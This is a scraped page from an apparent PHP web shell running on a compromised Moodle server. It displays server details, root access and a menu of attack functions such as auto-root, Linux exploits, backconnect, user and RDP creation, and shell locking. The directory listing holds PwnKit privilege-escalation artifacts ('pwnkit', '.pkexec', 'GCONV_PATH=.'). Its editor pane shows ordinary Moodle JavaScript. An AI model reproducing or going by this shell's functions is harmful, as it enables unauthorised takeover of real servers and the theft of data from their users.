Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
amd /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
emoji
[ DIR ]
drwxrwxrwx
local
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
adapter.js
190.74
KB
-rwxrwxrwx
addblockmodal.js
2.56
KB
-rwxrwxrwx
ajax.js
10.09
KB
-rwxrwxrwx
auto_rows.js
3.5
KB
-rwxrwxrwx
autoscroll.js
6.54
KB
-rwxrwxrwx
backoff_timer.js
5.12
KB
-rwxrwxrwx
chart_axis.js
7.43
KB
-rwxrwxrwx
chart_bar.js
3.13
KB
-rwxrwxrwx
chart_base.js
11.41
KB
-rwxrwxrwx
chart_builder.js
1.67
KB
-rwxrwxrwx
chart_line.js
2.13
KB
-rwxrwxrwx
chart_output.js
1.1
KB
-rwxrwxrwx
chart_output_base.js
2.09
KB
-rwxrwxrwx
chart_output_chartjs.js
10.95
KB
-rwxrwxrwx
chart_output_htmltable.js
3.36
KB
-rwxrwxrwx
chart_pie.js
3.09
KB
-rwxrwxrwx
chart_series.js
8.41
KB
-rwxrwxrwx
chartjs-lazy.js
670.93
KB
-rwxrwxrwx
chartjs.js
933
B
-rwxrwxrwx
checkbox-toggleall.js
12.78
KB
-rwxrwxrwx
config.js
1.05
KB
-rwxrwxrwx
custom_interaction_events.js
22.29
KB
-rwxrwxrwx
dragdrop.js
13.01
KB
-rwxrwxrwx
drawer.js
3.37
KB
-rwxrwxrwx
drawer_events.js
987
B
-rwxrwxrwx
event.js
3.99
KB
-rwxrwxrwx
first.js
1.38
KB
-rwxrwxrwx
form-autocomplete.js
50.91
KB
-rwxrwxrwx
form-cohort-selector.js
2.56
KB
-rwxrwxrwx
form-course-selector.js
3.87
KB
-rwxrwxrwx
fragment.js
4.72
KB
-rwxrwxrwx
fullscreen.js
1.66
KB
-rwxrwxrwx
icon_system.js
2.52
KB
-rwxrwxrwx
icon_system_fontawesome.js
3.95
KB
-rwxrwxrwx
icon_system_standard.js
2.29
KB
-rwxrwxrwx
inplace_editable.js
13.31
KB
-rwxrwxrwx
key_codes.js
1.38
KB
-rwxrwxrwx
loadingicon.js
3.89
KB
-rwxrwxrwx
localstorage.js
2.1
KB
-rwxrwxrwx
log.js
1.76
KB
-rwxrwxrwx
loglevel.js
9.66
KB
-rwxrwxrwx
modal.js
29.18
KB
-rwxrwxrwx
modal_backdrop.js
4.48
KB
-rwxrwxrwx
modal_cancel.js
1.44
KB
-rwxrwxrwx
modal_events.js
1.25
KB
-rwxrwxrwx
modal_factory.js
8.05
KB
-rwxrwxrwx
modal_registry.js
2.4
KB
-rwxrwxrwx
modal_save_cancel.js
2.14
KB
-rwxrwxrwx
mustache.js
26.69
KB
-rwxrwxrwx
network.js
6.78
KB
-rwxrwxrwx
notification.js
8.72
KB
-rwxrwxrwx
page_global.js
5.4
KB
-rwxrwxrwx
paged_content.js
2.87
KB
-rwxrwxrwx
paged_content_events.js
1.17
KB
-rwxrwxrwx
paged_content_factory.js
20.68
KB
-rwxrwxrwx
paged_content_pages.js
11.75
KB
-rwxrwxrwx
paged_content_paging_bar.js
20.34
KB
-rwxrwxrwx
paged_content_paging_bar_limit...
2.36
KB
-rwxrwxrwx
paged_content_paging_dropdown....
7.36
KB
-rwxrwxrwx
pending.js
1.59
KB
-rwxrwxrwx
permissionmanager.js
9.82
KB
-rwxrwxrwx
popover_region_controller.js
12.58
KB
-rwxrwxrwx
popper.js
79.2
KB
-rwxrwxrwx
prefetch.js
4.61
KB
-rwxrwxrwx
pubsub.js
2.17
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
search-input.js
3.24
KB
-rwxrwxrwx
sessionstorage.js
2.24
KB
-rwxrwxrwx
showhidesettings.js
11.83
KB
-rwxrwxrwx
sortable_list.js
29.51
KB
-rwxrwxrwx
storagewrapper.js
5.17
KB
-rwxrwxrwx
str.js
6.13
KB
-rwxrwxrwx
tag.js
19.79
KB
-rwxrwxrwx
templates.js
49.68
KB
-rwxrwxrwx
toast.js
2.72
KB
-rwxrwxrwx
tooltip.js
4.1
KB
-rwxrwxrwx
tree.js
18.06
KB
-rwxrwxrwx
truncate.js
6.6
KB
-rwxrwxrwx
url.js
3.69
KB
-rwxrwxrwx
user_date.js
9.34
KB
-rwxrwxrwx
userfeedback.js
2.91
KB
-rwxrwxrwx
utils.js
2.69
KB
-rwxrwxrwx
yui.js
1.15
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : paged_content_factory.js
// This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Factory to create a paged content widget. * * @module core/paged_content_factory * @copyright 2018 Ryan Wyllie <ryan@moodle.com> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ define( [ 'jquery', 'core/templates', 'core/notification', 'core/paged_content', 'core/paged_content_events', 'core/pubsub', 'core/ajax' ], function( $, Templates, Notification, PagedContent, PagedContentEvents, PubSub, Ajax ) { var TEMPLATES = { PAGED_CONTENT: 'core/paged_content' }; var DEFAULT = { ITEMS_PER_PAGE_SINGLE: 25, ITEMS_PER_PAGE_ARRAY: [25, 50, 100, 0], MAX_PAGES: 3 }; /** * Get the default context to render the paged content mustache * template. * * @return {object} */ var getDefaultTemplateContext = function() { return { pagingbar: false, pagingdropdown: false, skipjs: true, ignorecontrolwhileloading: true, controlplacementbottom: false }; }; /** * Get the default context to render the paging bar mustache template. * * @return {object} */ var getDefaultPagingBarTemplateContext = function() { return { showitemsperpageselector: false, itemsperpage: 35, previous: true, next: true, activepagenumber: 1, hidecontrolonsinglepage: true, pages: [] }; }; /** * Calculate the number of pages required for the given number of items and * how many of each item should appear on a page. * * @param {Number} numberOfItems How many items in total. * @param {Number} itemsPerPage How many items will be shown per page. * @return {Number} The number of pages required. */ var calculateNumberOfPages = function(numberOfItems, itemsPerPage) { var numberOfPages = 1; if (numberOfItems > 0) { var partial = numberOfItems % itemsPerPage; if (partial) { numberOfItems -= partial; numberOfPages = (numberOfItems / itemsPerPage) + 1; } else { numberOfPages = numberOfItems / itemsPerPage; } } return numberOfPages; }; /** * Build the context for the paging bar template when we have a known number * of items. * * @param {Number} numberOfItems How many items in total. * @param {Number} itemsPerPage How many items will be shown per page. * @return {object} Mustache template */ var buildPagingBarTemplateContextKnownLength = function(numberOfItems, itemsPerPage) { if (itemsPerPage === null) { itemsPerPage = DEFAULT.ITEMS_PER_PAGE_SINGLE; } if ($.isArray(itemsPerPage)) { // If we're given a total number of pages then we don't support a variable // set of items per page so just use the first one. itemsPerPage = itemsPerPage[0]; } var context = getDefaultPagingBarTemplateContext(); context.itemsperpage = itemsPerPage; var numberOfPages = calculateNumberOfPages(numberOfItems, itemsPerPage); for (var i = 1; i <= numberOfPages; i++) { var page = { number: i, page: "" + i, }; // Make the first page active by default. if (i === 1) { page.active = true; } context.pages.push(page); } context.barsize = 10; return context; }; /** * Convert the itemsPerPage value into a format applicable for the mustache template. * The given value can be either a single integer or an array of integers / objects. * * E.g. * In: [5, 10] * out: [{value: 5, active: true}, {value: 10, active: false}] * * In: [5, {value: 10, active: true}] * Out: [{value: 5, active: false}, {value: 10, active: true}] * * In: [{value: 5, active: false}, {value: 10, active: true}] * Out: [{value: 5, active: false}, {value: 10, active: true}] * * @param {int|int[]} itemsPerPage Options for number of items per page. * @return {int|array} */ var buildItemsPerPagePagingBarContext = function(itemsPerPage) { var context = []; if ($.isArray(itemsPerPage)) { // Convert the array into a format accepted by the template. context = itemsPerPage.map(function(num) { if (typeof num === 'number') { // If the item is just a plain number then convert it into // an object with value and active keys. return { value: num, active: false }; } else { // Otherwise we assume the caller has specified things correctly. return num; } }); var activeItems = context.filter(function(item) { return item.active; }); // Default the first item to active if one hasn't been specified. if (!activeItems.length) { context[0].active = true; } } else { // Convert the integer into a format accepted by the template. context = [{value: itemsPerPage, active: true}]; } return context; }; /** * Build the context for the paging bar template when we have an unknown * number of items. * * @param {Number} itemsPerPage How many items will be shown per page. * @return {object} Mustache template */ var buildPagingBarTemplateContextUnknownLength = function(itemsPerPage) { if (itemsPerPage === null) { itemsPerPage = DEFAULT.ITEMS_PER_PAGE_ARRAY; } var context = getDefaultPagingBarTemplateContext(); context.itemsperpage = buildItemsPerPagePagingBarContext(itemsPerPage); // Only display the items per page selector if there is more than one to choose from. context.showitemsperpageselector = $.isArray(itemsPerPage) && itemsPerPage.length > 1; return context; }; /** * Build the context to render the paging bar template with based on the number * of pages to show. * * @param {int|null} numberOfItems How many items are there total. * @param {int|null} itemsPerPage How many items will be shown per page. * @return {object} The template context. */ var buildPagingBarTemplateContext = function(numberOfItems, itemsPerPage) { if (numberOfItems) { return buildPagingBarTemplateContextKnownLength(numberOfItems, itemsPerPage); } else { return buildPagingBarTemplateContextUnknownLength(itemsPerPage); } }; /** * Build the context to render the paging dropdown template based on the number * of pages to show and items per page. * * This control is rendered with a gradual increase of the items per page to * limit the number of pages in the dropdown. Each page will show twice as much * as the previous page (except for the first two pages). * * By default there will only be 4 pages shown (including the "All" option) unless * a different number of pages is defined using the maxPages config value. * * For example: * Items per page = 25 * Would render a dropdown will 4 options: * 25 * 50 * 100 * All * * @param {Number} itemsPerPage How many items will be shown per page. * @param {object} config Configuration options provided by the client. * @return {object} The template context. */ var buildPagingDropdownTemplateContext = function(itemsPerPage, config) { if (itemsPerPage === null) { itemsPerPage = DEFAULT.ITEMS_PER_PAGE_SINGLE; } if ($.isArray(itemsPerPage)) { // If we're given an array for the items per page, rather than a number, // then just use that as the options for the dropdown. return { options: itemsPerPage }; } var context = { options: [] }; var totalItems = 0; var lastIncrease = 0; var maxPages = DEFAULT.MAX_PAGES; if (config.hasOwnProperty('maxPages')) { maxPages = config.maxPages; } for (var i = 1; i <= maxPages; i++) { var itemCount = 0; if (i <= 2) { itemCount = itemsPerPage; lastIncrease = itemsPerPage; } else { lastIncrease = lastIncrease * 2; itemCount = lastIncrease; } totalItems += itemCount; var option = { itemcount: itemCount, content: totalItems }; // Make the first option active by default. if (i === 1) { option.active = true; } context.options.push(option); } return context; }; /** * Build the context to render the paged content template with based on the number * of pages to show, items per page, and configuration option. * * By default the code will render a paging bar for the paging controls unless * otherwise specified in the provided config. * * @param {int|null} numberOfItems Total number of items. * @param {int|null|array} itemsPerPage How many items will be shown per page. * @param {object} config Configuration options provided by the client. * @return {object} The template context. */ var buildTemplateContext = function(numberOfItems, itemsPerPage, config) { var context = getDefaultTemplateContext(); if (config.hasOwnProperty('ignoreControlWhileLoading')) { context.ignorecontrolwhileloading = config.ignoreControlWhileLoading; } if (config.hasOwnProperty('controlPlacementBottom')) { context.controlplacementbottom = config.controlPlacementBottom; } if (config.hasOwnProperty('hideControlOnSinglePage')) { context.hidecontrolonsinglepage = config.hideControlOnSinglePage; } if (config.hasOwnProperty('ariaLabels')) { context.arialabels = config.ariaLabels; } if (config.hasOwnProperty('dropdown') && config.dropdown) { context.pagingdropdown = buildPagingDropdownTemplateContext(itemsPerPage, config); } else { context.pagingbar = buildPagingBarTemplateContext(numberOfItems, itemsPerPage); } return context; }; /** * Create a paged content widget where the complete list of items is not loaded * up front but will instead be loaded by an ajax request (or similar). * * The client code must provide a callback function which loads and renders the * items for each page. See PagedContent.init for more details. * * The function will return a deferred that is resolved with a jQuery object * for the HTML content and a string for the JavaScript. * * The current list of configuration options available are: * dropdown {bool} True to render the page control as a dropdown (paging bar is default). * maxPages {Number} The maximum number of pages to show in the dropdown (only works with dropdown option) * ignoreControlWhileLoading {bool} Disable the pagination controls while loading a page (default to true) * controlPlacementBottom {bool} Render controls under paged content (default to false) * * @param {function} renderPagesContentCallback Callback for loading and rendering the items. * @param {object} config Configuration options provided by the client. * @return {promise} Resolved with jQuery HTML and string JS. */ var create = function(renderPagesContentCallback, config) { return createWithTotalAndLimit(null, null, renderPagesContentCallback, config); }; /** * Create a paged content widget where the complete list of items is not loaded * up front but will instead be loaded by an ajax request (or similar). * * The client code must provide a callback function which loads and renders the * items for each page. See PagedContent.init for more details. * * The function will return a deferred that is resolved with a jQuery object * for the HTML content and a string for the JavaScript. * * The current list of configuration options available are: * dropdown {bool} True to render the page control as a dropdown (paging bar is default). * maxPages {Number} The maximum number of pages to show in the dropdown (only works with dropdown option) * ignoreControlWhileLoading {bool} Disable the pagination controls while loading a page (default to true) * controlPlacementBottom {bool} Render controls under paged content (default to false) * * @param {int|array|null} itemsPerPage How many items will be shown per page. * @param {function} renderPagesContentCallback Callback for loading and rendering the items. * @param {object} config Configuration options provided by the client. * @return {promise} Resolved with jQuery HTML and string JS. */ var createWithLimit = function(itemsPerPage, renderPagesContentCallback, config) { return createWithTotalAndLimit(null, itemsPerPage, renderPagesContentCallback, config); }; /** * Create a paged content widget where the complete list of items is not loaded * up front but will instead be loaded by an ajax request (or similar). * * The client code must provide a callback function which loads and renders the * items for each page. See PagedContent.init for more details. * * The function will return a deferred that is resolved with a jQuery object * for the HTML content and a string for the JavaScript. * * The current list of configuration options available are: * dropdown {bool} True to render the page control as a dropdown (paging bar is default). * maxPages {Number} The maximum number of pages to show in the dropdown (only works with dropdown option) * ignoreControlWhileLoading {bool} Disable the pagination controls while loading a page (default to true) * controlPlacementBottom {bool} Render controls under paged content (default to false) * * @param {int|null} numberOfItems How many items are there in total. * @param {int|array|null} itemsPerPage How many items will be shown per page. * @param {function} renderPagesContentCallback Callback for loading and rendering the items. * @param {object} config Configuration options provided by the client. * @return {promise} Resolved with jQuery HTML and string JS. */ var createWithTotalAndLimit = function(numberOfItems, itemsPerPage, renderPagesContentCallback, config) { config = config || {}; var deferred = $.Deferred(); var templateContext = buildTemplateContext(numberOfItems, itemsPerPage, config); Templates.render(TEMPLATES.PAGED_CONTENT, templateContext) .then(function(html, js) { html = $(html); var id = html.attr('id'); // Set the id to the custom namespace provided if (config.hasOwnProperty('eventNamespace')) { id = config.eventNamespace; } var container = html; PagedContent.init(container, renderPagesContentCallback, id); registerEvents(id, config); deferred.resolve(html, js); return; }) .fail(function(exception) { deferred.reject(exception); }) .fail(Notification.exception); return deferred.promise(); }; /** * Create a paged content widget where the complete list of items is loaded * up front. * * The client code must provide a callback function which renders the * items for each page. The callback will be provided with an array where each * value in the array is a the list of items to render for the page. * * The function will return a deferred that is resolved with a jQuery object * for the HTML content and a string for the JavaScript. * * The current list of configuration options available are: * dropdown {bool} True to render the page control as a dropdown (paging bar is default). * maxPages {Number} The maximum number of pages to show in the dropdown (only works with dropdown option) * ignoreControlWhileLoading {bool} Disable the pagination controls while loading a page (default to true) * controlPlacementBottom {bool} Render controls under paged content (default to false) * * @param {array} contentItems The list of items to paginate. * @param {Number} itemsPerPage How many items will be shown per page. * @param {function} renderContentCallback Callback for rendering the items for the page. * @param {object} config Configuration options provided by the client. * @return {promise} Resolved with jQuery HTML and string JS. */ var createFromStaticList = function(contentItems, itemsPerPage, renderContentCallback, config) { if (typeof config == 'undefined') { config = {}; } var numberOfItems = contentItems.length; return createWithTotalAndLimit(numberOfItems, itemsPerPage, function(pagesData) { var contentToRender = []; pagesData.forEach(function(pageData) { var begin = pageData.offset; var end = pageData.limit ? begin + pageData.limit : numberOfItems; var items = contentItems.slice(begin, end); contentToRender.push(items); }); return renderContentCallback(contentToRender); }, config); }; /** * Reset the last page number for the generated paged-content * This is used when we need a way to update the last page number outside of the getters callback * * @param {String} id ID of the paged content container * @param {Int} lastPageNumber The last page number */ var resetLastPageNumber = function(id, lastPageNumber) { PubSub.publish(id + PagedContentEvents.ALL_ITEMS_LOADED, lastPageNumber); }; /** * Generate the callback handler for the page limit persistence functionality * * @param {String} persistentLimitKey * @return {callback} */ var generateLimitHandler = function(persistentLimitKey) { var callback = function(limit) { var args = { preferences: [ { type: persistentLimitKey, value: limit } ] }; var request = { methodname: 'core_user_update_user_preferences', args: args }; Ajax.call([request]); }; return callback; }; /** * Set up any events based on config key values * * @param {string} namespace The namespace for this component * @param {object} config Config options passed to the factory */ var registerEvents = function(namespace, config) { if (config.hasOwnProperty('persistentLimitKey')) { PubSub.subscribe(namespace + PagedContentEvents.SET_ITEMS_PER_PAGE_LIMIT, generateLimitHandler(config.persistentLimitKey)); } }; return { create: create, createWithLimit: createWithLimit, createWithTotalAndLimit: createWithTotalAndLimit, createFromStaticList: createFromStaticList, // Backwards compatibility just in case anyone was using this. createFromAjax: createWithTotalAndLimit, resetLastPageNumber: resetLastPageNumber }; });
Close